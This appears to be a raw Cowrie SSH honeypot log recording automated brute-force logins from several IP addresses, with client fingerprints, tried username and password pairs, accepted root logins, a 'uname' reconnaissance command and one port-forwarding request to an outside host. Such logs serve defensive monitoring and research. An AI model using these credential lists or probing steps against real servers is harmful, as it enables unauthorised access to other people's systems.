{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:11:59.659900Z","src_ip":"212.227.235.229","session":"a223b0af8af6"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:11:59.755474Z","src_ip":"212.227.235.229","session":"a223b0af8af6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:12:00.171894Z","src_ip":"212.227.235.229","session":"a223b0af8af6"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:12:00.265330Z","src_ip":"212.227.235.229","session":"4bb4fbefed9f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:12:00.266176Z","src_ip":"212.227.235.229","session":"a223b0af8af6"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":54099,"dst_ip":"1.2.3.4","dst_port":22,"session":"54b53b8fd645","protocol":"ssh","message":"New connection: 45.125.211.194:54099 (1.2.3.4:22) [session: 54b53b8fd645]","sensor":"my-vps","timestamp":"2025-08-28T03:12:05.723374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:12:05.752921Z","src_ip":"45.125.211.194","session":"54b53b8fd645"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:12:05.953238Z","src_ip":"45.125.211.194","session":"54b53b8fd645"}
{"eventid":"cowrie.login.failed","username":"test","password":"abc123","message":"login attempt [test/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:12:06.831250Z","src_ip":"45.125.211.194","session":"54b53b8fd645"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:12:08.054967Z","src_ip":"45.125.211.194","session":"54b53b8fd645"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":19338,"dst_ip":"1.2.3.4","dst_port":22,"session":"019441cae831","protocol":"ssh","message":"New connection: 45.125.211.194:19338 (1.2.3.4:22) [session: 019441cae831]","sensor":"my-vps","timestamp":"2025-08-28T03:12:20.508234Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:12:20.522918Z","src_ip":"45.125.211.194","session":"019441cae831"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:12:20.718845Z","src_ip":"45.125.211.194","session":"019441cae831"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:12:21.559051Z","src_ip":"45.125.211.194","session":"019441cae831"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:12:22.771385Z","src_ip":"45.125.211.194","session":"019441cae831"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":29893,"dst_ip":"1.2.3.4","dst_port":22,"session":"f41dba99fa15","protocol":"ssh","message":"New connection: 45.125.211.194:29893 (1.2.3.4:22) [session: f41dba99fa15]","sensor":"my-vps","timestamp":"2025-08-28T03:12:35.313586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:12:35.349261Z","src_ip":"45.125.211.194","session":"f41dba99fa15"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:12:35.533540Z","src_ip":"45.125.211.194","session":"f41dba99fa15"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2w3e4r","message":"login attempt [root/1Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:12:36.365359Z","src_ip":"45.125.211.194","session":"f41dba99fa15"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:12:36.817494Z","src_ip":"45.125.211.194","session":"f41dba99fa15"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:12:36.818447Z","src_ip":"45.125.211.194","session":"f41dba99fa15"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:12:37.032237Z","src_ip":"45.125.211.194","session":"f41dba99fa15"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:12:37.033348Z","src_ip":"45.125.211.194","session":"f41dba99fa15"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":58780,"dst_ip":"1.2.3.4","dst_port":22,"session":"c99d866347d7","protocol":"ssh","message":"New connection: 45.125.211.194:58780 (1.2.3.4:22) [session: c99d866347d7]","sensor":"my-vps","timestamp":"2025-08-28T03:12:50.155532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:12:50.173351Z","src_ip":"45.125.211.194","session":"c99d866347d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:12:50.366539Z","src_ip":"45.125.211.194","session":"c99d866347d7"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123456","message":"login attempt [app/app123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:12:51.203460Z","src_ip":"45.125.211.194","session":"c99d866347d7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:12:52.416221Z","src_ip":"45.125.211.194","session":"c99d866347d7"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":52677,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bccc08e26f6","protocol":"ssh","message":"New connection: 45.125.211.194:52677 (1.2.3.4:22) [session: 3bccc08e26f6]","sensor":"my-vps","timestamp":"2025-08-28T03:13:04.979806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:13:05.006811Z","src_ip":"45.125.211.194","session":"3bccc08e26f6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:13:05.195252Z","src_ip":"45.125.211.194","session":"3bccc08e26f6"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic123","message":"login attempt [elastic/elastic123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:13:06.274763Z","src_ip":"45.125.211.194","session":"3bccc08e26f6"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:13:07.486930Z","src_ip":"45.125.211.194","session":"3bccc08e26f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46096,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb5f77f290cb","protocol":"ssh","message":"New connection: 212.227.235.229:46096 (1.2.3.4:22) [session: bb5f77f290cb]","sensor":"my-vps","timestamp":"2025-08-28T03:13:08.925044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:13:08.934531Z","src_ip":"212.227.235.229","session":"bb5f77f290cb"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:13:09.468238Z","src_ip":"212.227.235.229","session":"bb5f77f290cb"}
{"eventid":"cowrie.login.failed","username":"vhserver","password":"123456","message":"login attempt [vhserver/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:13:09.899729Z","src_ip":"212.227.235.229","session":"bb5f77f290cb"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:13:10.990016Z","src_ip":"212.227.235.229","session":"bb5f77f290cb"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":45414,"dst_ip":"1.2.3.4","dst_port":22,"session":"b326e47154cb","protocol":"ssh","message":"New connection: 45.125.211.194:45414 (1.2.3.4:22) [session: b326e47154cb]","sensor":"my-vps","timestamp":"2025-08-28T03:13:19.901088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:13:19.909818Z","src_ip":"45.125.211.194","session":"b326e47154cb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:13:20.109725Z","src_ip":"45.125.211.194","session":"b326e47154cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":19347,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ef1dda86ab3","protocol":"ssh","message":"New connection: 212.227.235.229:19347 (1.2.3.4:22) [session: 1ef1dda86ab3]","sensor":"my-vps","timestamp":"2025-08-28T03:13:20.839341Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:13:20.840379Z","src_ip":"212.227.235.229","session":"1ef1dda86ab3"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd","message":"login attempt [root/p@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:13:20.943256Z","src_ip":"45.125.211.194","session":"b326e47154cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":19730,"dst_ip":"1.2.3.4","dst_port":22,"session":"229229099e73","protocol":"ssh","message":"New connection: 212.227.235.229:19730 (1.2.3.4:22) [session: 229229099e73]","sensor":"my-vps","timestamp":"2025-08-28T03:13:20.999241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:13:21.000268Z","src_ip":"212.227.235.229","session":"229229099e73"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T03:13:21.159695Z","src_ip":"212.227.235.229","session":"229229099e73"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:13:21.439904Z","src_ip":"45.125.211.194","session":"b326e47154cb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:13:21.440748Z","src_ip":"45.125.211.194","session":"b326e47154cb"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:13:21.641205Z","src_ip":"212.227.235.229","session":"229229099e73"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:13:21.682555Z","src_ip":"45.125.211.194","session":"b326e47154cb"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:13:21.683798Z","src_ip":"45.125.211.194","session":"b326e47154cb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T03:13:21.801923Z","session":"229229099e73"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":37632,"dst_ip":"1.2.3.4","dst_port":22,"session":"71df43747c17","protocol":"ssh","message":"New connection: 194.233.79.134:37632 (1.2.3.4:22) [session: 71df43747c17]","sensor":"my-vps","timestamp":"2025-08-28T03:13:25.509538Z"}
